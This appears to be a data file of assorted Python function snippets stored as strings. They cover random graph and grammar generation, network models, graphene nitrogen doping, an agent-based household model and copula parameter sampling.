"def generate_cfg(numStart, numNonterminals, numTerminals, numProductions, min_length, max_length, onlyunaryterminal,\n terminalprob, minrhs):\n grammar = cfg.ContextFreeGrammar()\n if numTerminals == -1:\n terminals = list(dictionary.generateDictionary(numProductions * max_length))\n else:\n terminals = list(dictionary.generateDictionary(numTerminals))\n nonterminals = []\n terminalCounter = 0\n start = []\n if numStart == 1:\n start.append(\"S\")\n else:\n for i in xrange(numStart):\n start.append(\"S_\" + str(i))\n for s in start:\n nonterminals.append(s)\n vcup = []\n for terminal in terminals:\n vcup.append(terminal)\n for i in range(numNonterminals - numStart):\n nt = \"NT\" + str(i)\n nonterminals.append(nt)\n vcup.append(nt)\n productionSet = set()\n obligatoryrhs = []\n for x in xrange(minrhs):\n for nt in nonterminals:\n obligatoryrhs.append(nt)\n while len(productionSet) < numProductions:\n if len(productionSet) < len(obligatoryrhs):\n lhs = obligatoryrhs[len(productionSet)]\n else:\n lhs = random.choice(nonterminals)\n rhs = []\n rhslength = random.randrange(min_length, max_length + 1)\n # print rhslength\n if rhslength == 1 and onlyunaryterminal:\n if numTerminals == -1:\n rhs.append(terminals[terminalCounter])\n terminalCounter += 1\n else:\n rhs.append(random.choice(terminals))\n else:\n for i in range(rhslength):\n if random.random() < terminalprob:\n if numTerminals == -1:\n rhs.append(terminals[terminalCounter])\n terminalCounter += 1\n else:\n rhs.append(random.choice(terminals))\n else:\n rhs.append(random.choice(nonterminals))\n prod = (lhs, tuple(rhs))\n if not prod in productionSet:\n productionSet.add(prod)\n # print prod\n for nt in nonterminals:\n n = 0\n for lhs, rhs in productionSet:\n for sym in rhs:\n if sym == nt:\n break\n else:\n # not on the rhs of any nonterminal.\n while True:\n lhs = random.choice(nonterminals)\n if lhs != nt:\n rhslength = random.randrange(min_length, max_length + 1)\n if rhslength == 1 and not onlyunaryterminal:\n productionSet.add((lhs, (nt,)))\n break\n elif rhslength > 1:\n position = random.choice(range(rhslength))\n rhs = []\n for i in range(rhslength):\n if i == position:\n rhs.append(nt)\n else:\n if random.random() < terminalprob:\n if numTerminals == -1:\n rhs.append(terminals[terminalCounter])\n terminalCounter += 1\n else:\n rhs.append(random.choice(terminals))\n else:\n rhs.append(random.choice(nonterminals))\n productionSet.add((lhs, tuple(rhs)))\n\n # now we have the set of weighted productions.\n grammar.productions = productionSet\n grammar.nonterminals = nonterminals\n grammar.terminals = terminals\n grammar.start_set = start\n return grammar.trim()",
"def build_drop_fullgraphs(self, do_subgraph=False, graph_lib='pygraphviz'):\n if 'pygraphviz' == graph_lib:\n G = pgv.AGraph(strict=True, directed=True)\n else:\n G = nx.Graph()\n do_subgraph = False\n subgraph_dict = defaultdict(list) # k - node-ip, v - a list of graph nodes\n oid_gnid_dict = dict()\n\n for i, oid in enumerate(self.pg_spec.keys()):\n oid_gnid_dict[oid] = str(i)\n logger.info(\"oid to gid mapping done\")\n\n for dropspec in self.pg_spec.itervalues():\n gid = oid_gnid_dict[dropspec['oid']]\n ip = dropspec['node']\n subgraph_dict[ip].append(gid)\n if (dropspec['type'] == 'app'):\n G.add_node(gid, shape='rect', label='')#, fixedsize=True, hight=.05, width=.05)\n elif (dropspec['type'] == 'plain'): #parallelogram\n G.add_node(gid, shape='circle', label='')#, fixedsize=True, hight=.05, width=.05)\n logger.info(\"Graph nodes added\")\n\n for dropspec in self.pg_spec.itervalues():\n gid = oid_gnid_dict[dropspec['oid']]\n if (dropspec['type'] == 'app'):\n ds_kw = 'outputs' #down stream key word\n elif (dropspec['type'] == 'plain'):\n ds_kw = 'consumers'\n else:\n ds_kw = 'None'\n if (ds_kw in dropspec):\n for doid in dropspec[ds_kw]:\n G.add_edge(gid, oid_gnid_dict[doid])\n logger.info(\"Graph edges added\")\n\n if (do_subgraph):\n for i, subgraph_nodes in enumerate(subgraph_dict.values()):\n # we don't care about the subgraph label or rank\n subgraph = G.add_subgraph(subgraph_nodes, label='%d' % i, name=\"cluster_%d\" % i, rank=\"same\")\n subgraph.graph_attr['rank']='same'\n logger.info(\"Subgraph added\")\n\n return G",
"def simulate_graph(seed, cluster_sizes, del_factor, ins_factor):\n rand.seed(seed)\n cluster_boundaries = np.cumsum(cluster_sizes)\n print(\"#seed:\", seed)\n print(\"#deletion factor:\", del_factor)\n print(\"#insertion factor:\", ins_factor)\n optimal_costs = np.array([0])\n for c in range(0, len(cluster_sizes)-1):\n n_c = cluster_sizes[c+1]\n offset_c = cluster_boundaries[c]\n edges_c = generate_edges(n_c, offset_c)\n disturb_cluster(n_c, offset_c, edges_c, del_factor, optimal_costs)\n additional_edges(cluster_boundaries, ins_factor, optimal_costs)\n print(\"#optimal costs:\", optimal_costs)",
"def hyperbolic_generator():\n\n hyperbolicRadius = np.arccosh(1 + N / (2 * np.pi * pointDensity))\n hyperbolicThreshold = np.arccosh(1 + thresholdFrac * (np.cosh(hyperbolicRadius) - 1))\n\n data_hyperbolic = []\n for r in range(num_graphs):\n # generates dictionary of positions (in a circle of radius) for each node: node_pos = {node_i: (radius, theta)} <-- uses polar coordinates\n # uses the inversion sampling idea to give Euclidean radii sampled uniformly across a hyperbolic sheet\n node_pos = {}\n for i in range(N):\n rnd_angle = np.random.random() * 2 * np.pi\n p = np.random.random() # random float between 0 and 1\n rnd_radii = np.arccosh(1 + p * (np.cosh(hyperbolicRadius) - 1)) # <-- inversion sampling\n node_pos.update({i: (rnd_radii, rnd_angle)})\n\n # computes the adjacency matrix\n Adj_Matrix = np.zeros((N, N))\n for i in range(N):\n for j in range(N):\n ij_dist = hyp_dist(node_pos[i], node_pos[j])\n if ij_dist < hyperbolicThreshold:\n Adj_Matrix[i, j] = 1 # nodes that are connected are assigned a 1 in the matrix\n\n data_hyperbolic.append(Adj_Matrix)\n\n return data_hyperbolic",
"def graph_connectome(\n num_sampled,\n max_depth,\n num_iters=10,\n graph=None,\n reverse_graph=None,\n to_write=None,\n num_cpus=1,\n a_indices=None,\n b_indices=None,\n):\n num_a, num_b = to_write\n\n if a_indices is None:\n a_indices = np.array([i for i in range(num_a)])\n if b_indices is None:\n b_indices = np.array([i for i in range(num_b)])\n\n def random_var_gen(iter_val):\n start = np.random.choice(a_indices, size=num_sampled[0], replace=False)\n end = np.random.choice(b_indices, size=num_sampled[1], replace=False)\n end = end + num_a\n\n return start, end\n\n def fn_to_eval(start, end):\n return (\n len(find_connected_limited(graph, start, end, max_depth, reverse_graph)),\n )\n\n result = monte_carlo(fn_to_eval, random_var_gen, num_iters, num_cpus=num_cpus)\n df = list_to_df(\n result,\n [\"Connections\"],\n )\n result = summarise_monte_carlo(\n df,\n plot=False,\n )\n ordered_dist = get_distribution(df, \"Connections\", num_iters)\n\n return {\n \"full_results\": df,\n \"summary_stats\": result,\n \"dist\": ordered_dist,\n }",
"def create_random_graph(number_of_vertices, number_of_edges, radius, thickness):\n\n global screen\n dist_apart = radius * 3\n\n for i in range(0, number_of_vertices):\n vtx_x, vtx_y = generate_valid_coordinates(radius, dist_apart)\n \n vtx = {\"ID\": i,\n \"x\": vtx_x,\n \"y\": vtx_y,\n \"color\": \"WHITE\",\n \"adjacent\": [],\n }\n\n VERTICES.append(vtx);\n\n # Assign adjacency\n for i in range(0, number_of_edges):\n vtx_one = None\n vtx_two = None\n\n while vtx_one is vtx_two:\n vtx_one = random.randint(0, number_of_vertices - 1)\n vtx_two = random.randint(0, number_of_vertices - 1)\n\n VERTICES[vtx_one][\"adjacent\"].append(VERTICES[vtx_two][\"ID\"])\n VERTICES[vtx_two][\"adjacent\"].append(VERTICES[vtx_one][\"ID\"])\n\n draw_graph(VERTICES, RADIUS, THICKNESS)",
"def configuration_model(g, kmin, kmax, size, c, offset):\n # Makes sure that networks have an even number of half-edges, since\n # the number of half-edges prepared for linking can be uneven.\n its = inverse_transform_sampling(g, kmin, kmax, size, offset)\n sum_its = sum(its)\n while sum_its % 2 != c % 2:\n its = inverse_transform_sampling(g, kmin, kmax, size, offset)\n sum_its = sum(its)\n\n # Brings the dist. seq. into the half-edge form,\n # e.g. [1,2,3] -> [0,1,1,2,2,2]\n seq = []\n k = 0\n for i in range(size):\n for j in range(k, k + its[i]):\n seq += [i]\n k += 1\n\n # Edges that link to other modules\n c_node = np.random.choice(seq, size=c, replace=False)\n for i in range(c):\n seq.remove(c_node[i])\n \n # Connects the half-edges randomly among each other\n np.random.shuffle(seq)\n links = np.sort(np.reshape(seq, (int(len(seq)/2), 2)))\n links = links.tolist()\n \n # Separates the unique and the multi/self links.\n # The list links is left with multi and self links.\n links_unique = []\n k = 0\n while k < len(links):\n if links[k][0] != links[k][1] and links[k] not in links_unique:\n links_unique.append(links.pop(k))\n else:\n k += 1\n \n # Rewires the multi/self links\n for multi in links:\n r1 = random.randint(0, len(links_unique)-1)\n r2 = random.randint(0, 1)\n r3 = random.randint(0, 1)\n links_unique[r1][r2], multi[r3] = multi[r3], links_unique[r1][r2]\n \n network = gt.Graph(directed=False)\n network.add_edge_list(links_unique)\n network.add_edge_list(links)\n\n gt.stats.remove_parallel_edges(network)\n gt.stats.remove_self_loops(network)\n \n return network, c_node",
"def choose_random(self, exclude):\n other_edges = list(set(self.vertices()) - set(exclude))\n return random.choice(other_edges)",
"def generate_random_DC_single_force_coupled_tensor():\n # 1. --- Specify DC moment tensor to rotate ---:\n DC_MT_to_rot = np.vstack(([0.,0.,1.],[0.,0.,0.], [1.,0.,0.])) # DC moment tensor\n # 2. --- Specify single force 3-vector in same direction as slip of DC solution ---:\n NED_single_force_vector_to_rotate = np.array([1.,0.,0.], dtype=float)\n # 3. --- Rotate DC moment tensor and single force by same random rotation on sphere:\n # 3.a. Get a random sample 3-vector on a 3-unit sphere to use to calculate random theta and phi rotation angles:\n a_unnormalised = np.array([np.random.normal(loc=0.0, scale=1.0), np.random.normal(loc=0.0, scale=1.0), np.random.normal(loc=0.0, scale=1.0)], dtype=float) # Generate 3 indepdendent normal deviates\n a_normalised = a_unnormalised/(np.sum(a_unnormalised**2)**-0.5) # Normallise sample onto unit 3-sphere - As in Muller (1959)\n # And normallise so that vector magnitude = 1:\n a_normalised = a_normalised/((np.sum(a_normalised**2))**0.5)\n x = a_normalised[0]\n y = a_normalised[1]\n z = a_normalised[2]\n theta = np.arctan2(np.sqrt((x**2)+(y**2)),z) #np.arccos(z)\n phi = np.arctan2(y,x) #np.arccos(x/np.sin(theta))\n # 3.b. Rotate DC moment tensor by random 3D angle:\n random_DC_MT = rot_mt_by_theta_phi(DC_MT_to_rot, theta, phi)\n random_DC_six_MT = get_six_MT_from_full_MT_array(random_DC_MT)\n random_DC_six_MT_normalised = random_DC_six_MT/((np.sum(random_DC_six_MT**2))**0.5) # And normallise so that moment tensor magnitude = 1\n random_DC_six_MT_normalised = np.reshape(random_DC_six_MT_normalised, (6, 1)) # And set to correct dimensions (so matrix multiplication in forward model works correctly)\n # 3.c. Rotate Single force 3-vector by the same random 3D angle:\n random_coupled_NED_single_force = rot_single_force_by_theta_phi(NED_single_force_vector_to_rotate, theta, phi)\n random_coupled_single_force = np.array([random_coupled_NED_single_force[1], random_coupled_NED_single_force[0], random_coupled_NED_single_force[2]]) # Convert single force from NED coords to END coords (as that is what greens functions are in)\n random_coupled_single_force = np.reshape(random_coupled_single_force, (3, 1))\n # 4. --- Get random fraction amplitude DC and single force components (sum of amplitudes is to 1) ---:\n random_amp_frac = random.random() # random number between 0. and 1.\n random_DC_six_MT_normalised = random_DC_six_MT_normalised*random_amp_frac\n random_coupled_single_force = random_coupled_single_force*(1.-random_amp_frac)\n # 5. --- Finally combine to tensor of length 9 ---:\n random_DC_single_force_coupled_tensor = np.vstack((random_DC_six_MT_normalised, random_coupled_single_force))\n return random_DC_single_force_coupled_tensor, random_amp_frac",
"def gen_graph(self, seed=None):\n graph = _branched_graph(\"dum\", self.bfact, self.levels)\n graph = _random_replace_nodes_attribute(graph, self.residues,\n self.weights, \"resname\", seed)\n return graph",
"def generate_random_graph(num_nodes):\n root = Node()\n nodes = set([root])\n edge_count = 0\n num_edges = int(math.log(num_nodes, 1.7)) * num_nodes\n\n for i in range(1, num_nodes):\n node = Node()\n node.edges.add(random.sample(nodes, 1)[0])\n nodes.add(node)\n edge_count += 1\n\n # Generate edges until \n for j in range(edge_count, num_edges):\n tail, head = random.sample(nodes, 2)\n while head in tail.edges:\n tail, head = random.sample(nodes, 2)\n tail.edges.add(head)\n edge_count += 1\n \n # Convert our graph to CSR representation by first creating an adjacency\n # matrix and then transforming it to a CSR\n\n # Generating adjacency matrix\n adjacency_matrix = [[0] * num_nodes for i in range(num_nodes)]\n sums = defaultdict(int)\n stack = [root]\n visited = set()\n while stack:\n curr = stack.pop()\n if curr not in visited:\n visited.add(curr)\n for node in curr.edges:\n stack.append(node)\n adjacency_matrix[curr.id][node.id] = 1.0\n sums[curr.id] += 1\n\n # Adjacency matrix -> CSR\n offset = 0\n csr = [[] for i in range(3)]\n nonzeros = np.nonzero(adjacency_matrix)\n last_row = -1\n for i in range(len(nonzeros[0])):\n row = nonzeros[0][i]\n col = nonzeros[1][i]\n outdegree = sums[row]\n if last_row != row:\n csr[1].append(offset)\n csr[0].append(adjacency_matrix[row][col] / outdegree)\n csr[2].append(col)\n offset += 1\n last_row = row\n csr[1].append(offset)\n\n # Write to txt and pickle\n with open(generate_filepath_txt(num_nodes), \"w\") as fp:\n fp.write(' '.join(str(i) for i in csr[0]) + '\\n')\n fp.write(' '.join(str(i) for i in csr[1]) + '\\n')\n fp.write(' '.join(str(i) for i in csr[2]))\n with open(generate_filepath_pickle(num_nodes), \"wb\") as fp:\n pickle.dump(csr, fp)",
"def generate_model(self):\n rootpath = 'c:\\\\Users\\\\Gamelab\\\\Desktop\\\\RT\\\\Others\\\\Thesis\\\\Thesis_coding\\\\ABM\\\\' \n \n df = pd.read_csv(rootpath+'data\\\\subset_initialized_latlonvalues.csv')\n df = df.drop(columns='Unnamed: 0')\n households_in_block = {}\n household_ids_in_block = {}\n # holds all the graphs indexed by blockid [geoid]\n \n def add_and_remove_edges(G, p_new_connection, p_remove_connection): \n\n new_edges = [] \n rem_edges = [] \n for node in G.nodes(): \n # find the other nodes this one is connected to \n connected = [to for (fr, to) in G.edges(node)] \n # and find the remainder of nodes, which are candidates for new edges \n unconnected = [n for n in G.nodes() if not n in connected] \n\n # probabilistically add a random edge \n if len(unconnected): # only try if new edge is possible \n if random.random() < p_new_connection: \n new = random.choice(unconnected) \n G.add_edge(node, new) \n #print(\"\\tnew edge:\\t {} -- {}\".format(node, new) \n new_edges.append( (node, new) ) \n # book-keeping, in case both add and remove done in same cycle \n unconnected.remove(new) \n connected.append(new) \n\n # probabilistically remove a random edge \n if len(connected): # only try if an edge exists to remove \n if random.random() < p_remove_connection: \n remove = random.choice(connected) \n G.remove_edge(node, remove) \n #print \"\\tedge removed:\\t {} -- {}\".format(node, remove) \n rem_edges.append( (node, remove) ) \n # book-keeping, in case lists are important later? \n connected.remove(remove) \n unconnected.append(remove) \n return rem_edges, new_edges\n\n\n\n\n #now i need to get number of geoids unique \n for block in df['geoid'].unique(): \n G_temp=nx.Graph()\n households_in_block[block] = df[df['geoid']==block] # contains all the information about the households \n household_ids_in_block[block] = df[df['geoid']==block]['CASE_ID'].values \n # contains only their ID\n # you only need id to initialize a node\n tempdf = households_in_block[block]\n for household in household_ids_in_block[block]:\n lon = tempdf.loc[tempdf['CASE_ID']==household,'lon'].values[0]\n lat = tempdf.loc[tempdf['CASE_ID']==household,'lat'].values[0] \n \n G_temp.add_node(str(household), pos=(lon,lat))\n self.G.add_node(str(household), pos=(lon,lat))\n \n ## add G to the dictionary\n self.graph_dict[block] = G_temp\n \n \n rem_edges, new_edges = add_and_remove_edges(self.G, 0.5, 0.5)\n self.G.remove_edges_from(rem_edges)\n self.G.add_edges_from(new_edges)\n\n \n\n self.grid= NetworkGrid(self.G)\n \n for _, row in df.iterrows(): # index, row in ...\n \n agent = Household(unique_id = str(row['CASE_ID']),\n model = self, \n income = row['income'],\n age= row['age'],\n size= row['household_'],\n ami_category = row['ami_categ'],\n elec_consumption= row['elec_consumption'],\n attitude = row['attitude'],\n pbc = row['pbc'],\n subnorms = row['subnorms'],\n geoid = row['geoid'],\n tract = row['tract'],\n bgid = row['bgid'],\n adoption_status = 0)\n \n \n\n if agent:\n self.schedule.add(agent)\n y = row['lat']\n x = row['lon']\n self.grid.place_agent(agent, node_id=agent.unique_id)\n #self.space.place_agent(agent, (x, y))\n #agent.pos = (x, y)",
"def check_for_isomorphism(graph1: list, graph2: list, directed=False) -> bool:\n matrix1 = get_adjancy_matrix(graph1, directed)\n matrix2 = get_adjancy_matrix(graph2, directed)\n\n if num_vertices(matrix1, matrix2):\n if num_edges(matrix1, matrix2):\n degrees = vertices_degree(matrix1, matrix2)\n if degrees[0]:\n return permutations(matrix1, matrix2, degrees[1:])\n return False",
"def generate_N_doping(path, N_graphitic, N_pyridinic, N_pyrrolic, filename1):\n global bond_list\n bond_list = bond_list_1 + bond_list_3\n atom_list = read_in_graphene(path)\n rings = find_rings(atom_list)\n bond_list = bond_list_1 + bond_list_3\n map_3, map_2, map_2n = filter_carbon_atoms(atom_list, rings)\n graphitic = N_graphitic \n pyridinic = N_pyridinic\n pyrrolic = N_pyrrolic\n attempt = len(atom_list) / 10\n choices = [1, 2, 3]\n while (((N_graphitic > 0) or (N_pyridinic > 0) or (N_pyrrolic > 0)) and (attempt > 0)):\n print(\"Left to add: \", \"N_graphitic \", N_graphitic, \"N_pyridinic \", N_pyridinic, \"N_pyrrolic \", N_pyrrolic)\n if (N_graphitic == 0):\n try:\n choices.remove(1)\n except:\n pass\n if (N_pyridinic == 0):\n try:\n choices.remove(2)\n except:\n pass\n if (N_pyrrolic == 0):\n try:\n choices.remove(3)\n except:\n pass\n choice = random.choice(choices)\n if (choice == 1):\n while ((N_graphitic > 0) and (len(map_3) > 0)):\n random_atom = random.choice(map_3)\n N_graphitic -= 1\n N = Atom(random_atom.atom_number, \"N3\", \"N3A\", str(graphitic - N_graphitic), float(\"{0:.3f}\".format(random_atom.x)), float(\"{0:.3f}\".format(random_atom.y)), float(\"{0:.3f}\".format(random_atom.z)))\n if ((len(identify_bonds(random_atom, atom_list)) == 3) and ((identify_bonds(random_atom, atom_list)[0][0].atom_name == \"CX\") or (identify_bonds(random_atom, atom_list)[0][0].atom_name == \"CY\")) and ((identify_bonds(random_atom, atom_list)[1][0].atom_name == \"CX\") or identify_bonds(random_atom, atom_list)[1][0].atom_name == \"CY\") and ((identify_bonds(random_atom, atom_list)[2][0].atom_name == \"CX\") or (identify_bonds(random_atom, atom_list)[2][0].atom_name == \"CY\"))):\n for ring in rings:\n if (random_atom in ring):\n for atom in ring:\n try:\n map_3.remove(atom)\n except:\n pass\n try:\n map_2.remove(atom)\n except:\n pass\n try:\n map_2n.remove(atom)\n except:\n pass\n try:\n atom_list.remove(random_atom)\n except:\n pass\n atom_list.append(N)\n else:\n attempt -= 1\n elif (choice == 2):\n while ((N_pyridinic > 0) and (len(map_2) > 0)): \n random_atom = random.choice(map_2)\n N_pyridinic -= 1\n N = Atom(random_atom.atom_number, \"N2\", \"N2A\", str(pyridinic - N_pyridinic), float(\"{0:.3f}\".format(random_atom.x)), float(\"{0:.3f}\".format(random_atom.y)), float(\"{0:.3f}\".format(random_atom.z)))\n if ((len(identify_bonds(random_atom, atom_list)) == 2) and ((identify_bonds(random_atom, atom_list)[0][0].atom_name == \"CX\") or (identify_bonds(random_atom, atom_list)[0][0].atom_name == \"CY\")) and ((identify_bonds(random_atom, atom_list)[1][0].atom_name == \"CX\") or identify_bonds(random_atom, atom_list)[1][0].atom_name == \"CY\") ):\n found = False\n for ring in rings:\n if (random_atom in ring):\n found = True\n for atom in ring:\n try:\n map_3.remove(atom)\n except:\n pass\n try:\n map_2.remove(atom)\n except:\n pass\n try:\n map_2n.remove(atom)\n except:\n pass\n if (found == False):\n try:\n map_3.remove(random_atom)\n except:\n pass\n try:\n map_2.remove(random_atom)\n except:\n pass\n try:\n map_2n.remove(random_atom)\n except:\n pass\n atom_list.remove(random_atom)\n atom_list.append(N)\n else:\n attempt -= 1\n else: \n attempt -= 1\n elif (choice == 3):\n while ((N_pyrrolic > 0) and (len(map_2n) > 0)):\n random_atom_1 = random.choice(map_2n)\n for neighbour in identify_bonds(random_atom_1, atom_list):\n if (len(identify_bonds(neighbour[0], atom_list)) == 2):\n random_atom_2 = neighbour[0]\n break\n for ring in rings:\n if (random_atom_1 in ring):\n center_6 = {}\n center_6['x'] = 0\n center_6['y'] = 0\n center_6['z'] = 0\n center_4 = {}\n center_4['x'] = 0\n center_4['y'] = 0\n center_4['z'] = 0\n for atom in ring:\n center_6['x'] += atom.x\n center_6['y'] += atom.y\n center_6['z'] += atom.z\n if ((atom != random_atom_1) and (atom != random_atom_2)):\n center_4['x'] += atom.x\n center_4['y'] += atom.y\n center_4['z'] += atom.z\n center_6['x'] /= 6\n center_6['y'] /= 6\n center_6['z'] /= 6\n center_4['x'] /= 4\n center_4['y'] /= 4\n center_4['z'] /= 4\n N_pyrrolic -= 1\n p = 0.6\n limit = 0.3\n if ((-limit < center_4['x'] - center_6['x'] < limit) and (-limit < center_4['y'] - center_6['y'] < limit)): \n N = Atom(random_atom_1.atom_number, \"N1\", \"N2N\", str(pyrrolic - N_pyrrolic), float(\"{0:.3f}\".format(center_6['x'])), float(\"{0:.3f}\".format(center_6['y'])), float(\"{0:.3f}\".format(center_6['z']))) \n elif ((-limit < center_4['x'] - center_6['x'] < limit) and (center_4['y'] - center_6['y'] < -limit)):\n N = Atom(random_atom_1.atom_number, \"N1\", \"N2N\", str(pyrrolic - N_pyrrolic), float(\"{0:.3f}\".format(center_6['x'])), float(\"{0:.3f}\".format(center_6['y'] + p/2)), float(\"{0:.3f}\".format(center_6['z']))) \n elif ((-limit < center_4['x'] - center_6['x'] < limit) and (center_4['y'] - center_6['y'] > limit)):\n N = Atom(random_atom_1.atom_number, \"N1\", \"N2N\", str(pyrrolic - N_pyrrolic), float(\"{0:.3f}\".format(center_6['x'])), float(\"{0:.3f}\".format(center_6['y'] - p/2)), float(\"{0:.3f}\".format(center_6['z']))) \n elif ((center_4['x'] - center_6['x'] < -limit) and (-limit < center_4['y'] - center_6['y'] < limit)):\n N = Atom(random_atom_1.atom_number, \"N1\", \"N2N\", str(pyrrolic - N_pyrrolic), float(\"{0:.3f}\".format(center_6['x'] + p)), float(\"{0:.3f}\".format(center_6['y'])), float(\"{0:.3f}\".format(center_6['z']))) \n elif ((center_4['x'] - center_6['x'] < -limit) and (center_4['y'] - center_6['y'] < -limit)):\n N = Atom(random_atom_1.atom_number, \"N1\", \"N2N\", str(pyrrolic - N_pyrrolic), float(\"{0:.3f}\".format(center_6['x'] + p)), float(\"{0:.3f}\".format(center_6['y'] + p/2)), float(\"{0:.3f}\".format(center_6['z']))) \n elif ((center_4['x'] - center_6['x'] < -limit) and (center_4['y'] - center_6['y'] > limit)):\n N = Atom(random_atom_1.atom_number, \"N1\", \"N2N\", str(pyrrolic - N_pyrrolic), float(\"{0:.3f}\".format(center_6['x'] + p)), float(\"{0:.3f}\".format(center_6['y'] - p/2)), float(\"{0:.3f}\".format(center_6['z']))) \n elif ((center_4['x'] - center_6['x'] > limit) and (-limit < center_4['y'] - center_6['y'] < limit)):\n N = Atom(random_atom_1.atom_number, \"N1\", \"N2N\", str(pyrrolic - N_pyrrolic), float(\"{0:.3f}\".format(center_6['x'] - p)), float(\"{0:.3f}\".format(center_6['y'])), float(\"{0:.3f}\".format(center_6['z']))) \n elif ((center_4['x'] - center_6['x'] > limit) and (center_4['y'] - center_6['y'] < -limit)):\n N = Atom(random_atom_1.atom_number, \"N1\", \"N2N\", str(pyrrolic - N_pyrrolic), float(\"{0:.3f}\".format(center_6['x'] - p)), float(\"{0:.3f}\".format(center_6['y'] + p/2)), float(\"{0:.3f}\".format(center_6['z']))) \n elif ((center_4['x'] - center_6['x'] > limit) and (center_4['y'] - center_6['y'] > limit)):\n N = Atom(random_atom_1.atom_number, \"N1\", \"N2N\", str(pyrrolic - N_pyrrolic), float(\"{0:.3f}\".format(center_6['x'] - p)), float(\"{0:.3f}\".format(center_6['y'] - p/2)), float(\"{0:.3f}\".format(center_6['z']))) \n for ring in rings:\n if (random_atom_1 in ring):\n for atom in ring:\n try:\n map_3.remove(atom)\n except:\n pass\n try:\n map_2.remove(atom)\n except:\n pass\n try:\n map_2n.remove(atom)\n except:\n pass\n for mol in identify_bonds(atom, atom_list):\n try:\n map_2n.remove(mol[0])\n except:\n pass\n try:\n atom_list.remove(random_atom_1)\n atom_list.remove(random_atom_2)\n except:\n pass\n atom_list.append(N)\n else:\n attempt -= 1\n attempt -= 1\n writepdb(atom_list, filename1)\n print(\"done.\")\n return 'done.'",
"def get_dominant_graph(msm, with_comm_classes=False):\n\n g = AGraph(strict=False, directed=True)\n\n g.graph_attr.update(size=\"7.75, 10.25\")\n g.graph_attr.update(dpi=\"300\")\n for i in range(msm.num_nodes):\n if(i in msm.a):\n g.add_node(i, color = 'blue')\n elif(i in msm.b):\n g.add_node(i, color = 'green')\n elif(i in msm.dominant_pathway):\n g.add_node(i, color= 'red')\n else:\n g.add_node(i)\n\n if with_comm_classes:\n comm_classes = msm.communication_classes\n\n for (i, comm) in enumerate(comm_classes):\n g.add_subgraph(nbunch=comm, name='cluster%d' % i,\n style='rounded, dotted',\n color='lightgrey',\n label='<<B>Communication class %d</B>>' % (i + 1))\n\n for from_node in range(msm.num_nodes):\n for to_node in get_adjacent_nodes(msm, from_node, discard_self=False):\n if msm.effective_probability_current[from_node, to_node] != 0.0:\n label = '%.2E' % msm.effective_probability_current[from_node, to_node]\n if([from_node, to_node] in msm.dominant_pathway_format):\n g.add_edge(from_node, to_node, color='red' , label=label)\n else:\n \tg.add_edge(from_node, to_node, label=label)\n\n return g",
"def __init__(self, graph: ghidra.graph.GImplicitDirectedGraph):\n ...",
"def generate_random_request(constr=None):\n constr = constr or dict()\n copula_spec = dict()\n\n # Handle copula version\n if 'version' in constr.keys():\n version = constr['version']\n else:\n version = np.random.choice(['scaled_archimedean', 'nonstationary', 'warmglow'])\n copula_spec['version'] = version\n\n # Handle copula spec\n if version in ['scaled_archimedean']:\n copula_spec['scaled_archimedean'] = dict()\n copula_spec['scaled_archimedean']['version'] = 'scaled_archimedean'\n\n generating_function = np.random.choice([1])\n marginals = np.random.choice(['power', 'exponential'], 2)\n\n copula_spec['scaled_archimedean']['generating_function'] = generating_function\n copula_spec['scaled_archimedean']['marginals'] = marginals\n copula_spec['scaled_archimedean']['bounds'] = np.random.uniform(0.1, 10, 2)\n copula_spec['scaled_archimedean']['u'] = np.random.uniform(0.01, 0.99, 2)\n copula_spec['scaled_archimedean']['delta'] = np.random.uniform(0.001, 5)\n copula_spec['scaled_archimedean']['r'] = np.random.uniform(0.001, 5, 2)\n copula_spec['scaled_archimedean']['a'] = np.random.uniform(0.01, 10)\n copula_spec['scaled_archimedean']['b'] = np.random.normal()\n\n # We want to be able to request some constraint special cases.\n if 'r' in constr.keys():\n copula_spec['r'] = constr['r']\n if 'bounds' in constr.keys():\n copula_spec['scaled_archimedean']['bounds'] = constr['bounds']\n if 'a' in constr.keys():\n copula_spec['scaled_archimedean']['a'] = constr['a']\n if 'b' in constr.keys():\n copula_spec['scaled_archimedean']['b'] = constr['b']\n if 'u' in constr.keys():\n copula_spec['scaled_archimedean']['u'] = constr['u']\n if 'delta' in constr.keys():\n copula_spec['scaled_archimedean']['delta'] = constr['delta']\n\n if version in ['nonstationary', 'warmglow']:\n copula_spec[version] = dict()\n copula_spec[version]['version'] = version\n copula_spec[version]['alpha'] = np.random.uniform(0.1, 5.0)\n copula_spec[version]['beta'] = np.random.uniform(0.1, 5.0)\n copula_spec[version]['gamma'] = np.random.uniform(0.1, 5.0)\n copula_spec[version]['y_scale'] = np.random.uniform(0.1, 5.0)\n copula_spec[version]['discount_factors'] = \\\n {t: np.random.uniform(0.2, 1.0) for t in [0, 1, 3, 6, 12, 24]}\n\n random_weights = {t: np.random.uniform(0.1, 1.0) for t in [0, 1, 3, 6, 12, 24]}\n\n # Optional arguments\n copula_spec[version]['unrestricted_weights'] = \\\n np.random.choice([random_weights, None], p=[0.3, 0.7])\n copula_spec[version]['discounting'] = \\\n np.random.choice([None, 'hyperbolic', 'exponential'], p=[0.6, 0.2, 0.2])\n\n # Some version-specific arguments\n if version in [\"warmglow\"]:\n copula_spec[version]['warmglow_type'] = \\\n np.random.choice([\"constant\", \"linear\"], p=[0.5, 0.5])\n\n # These are derived attributes and thus need to be created at the very end.\n is_normalized = np.random.choice([True, False])\n if is_normalized:\n x, y = np.random.uniform(0, 1, 2)\n else:\n if version in ['scaled_archimedean']:\n bounds = copula_spec['scaled_archimedean']['bounds']\n x = np.random.uniform(0, bounds[0])\n y = np.random.uniform(0, bounds[1])\n elif version in ['nonstationary', 'warmglow']:\n x = np.random.uniform(0, 10)\n y = np.random.uniform(0, 10)\n else:\n raise NotImplementedError\n\n return x, y, is_normalized, copula_spec",
"def isomorphic(graph1, graph2):\r\n\r\n gd1 = _TripleCanonicalizer(graph1).to_hash()\r\n gd2 = _TripleCanonicalizer(graph2).to_hash()\r\n return gd1 == gd2",
